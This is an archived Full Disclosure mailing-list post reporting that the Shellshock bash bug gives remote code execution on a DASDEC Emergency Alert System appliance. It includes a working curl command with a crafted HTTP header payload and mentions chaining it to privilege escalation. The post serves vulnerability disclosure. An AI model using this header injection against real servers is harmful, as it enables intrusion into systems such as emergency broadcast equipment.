[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] Critical bash vulnerability CVE-2014-6271
From: Matt Hazinski <mhazinsk () vt ! edu>
Date: 2014-09-26 18:02:51
Message-ID: 8342595e-60ea-4a75-8412-c91d3e362a9c () vt ! edu
[Download RAW message or body]
On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:
> Worse that heartbleed?
>
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
>
> http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
>
I'm able to get remote code execution via CVE-2014-6271 on the Digital
Alert Systems DASDEC. This appliance is used by broadcasters to send and
receive Emergency Alert System messages over IP and AFSK. Once
authenticated,
an attacker can interrupt broadcasts (via a relay) and play arbitrary audio
over the airwaves.
Exploiting it only requires a malicious HTTP header:
curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable >
/tmp/dumped_file'
http://192.168.0.45/dasdec/dasdec.csp
[matt@WUVT-EAS ~]# cat /tmp/dumped_file
vulnerable
Commands are executed as the apache user, but privilege escalation can
still
be obtained through CVE-2009-2692 despite the vendor's recent cumulative
security patch.
I suspect all versions of the DASDEC are vulnerable to this, although I
only have a DASDEC-1EN running software version 2.0-2 to test.
--
Matt Hazinski
mhazinsk@vt.edu
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic